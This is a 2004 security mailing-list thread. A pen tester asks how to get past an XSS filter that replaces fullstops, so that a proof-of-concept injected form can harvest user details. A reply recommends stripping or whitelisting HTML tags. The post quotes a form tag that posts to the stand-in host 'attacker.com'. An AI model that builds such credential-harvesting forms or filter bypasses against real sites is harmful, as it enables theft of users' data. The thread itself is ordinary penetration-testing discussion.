mailing list archives
RE: Fullstop Substitution in XSS
From: "V. Poddubniy" <vpoddubniy () mail ru>
Date: Tue, 1 Jun 2004 00:37:22 +0400
Why not to prohibit HTML tags at all? Or just accept only some tags (b,
i, u) without params? It will stop all your problems...
(I know, you NEED tags, but usually, when people say so, it means, that
they just do not want to do it, but they often can...)
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, May 29, 2004 8:49 AM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering,
Any help would be appreciated.
enune () fribble net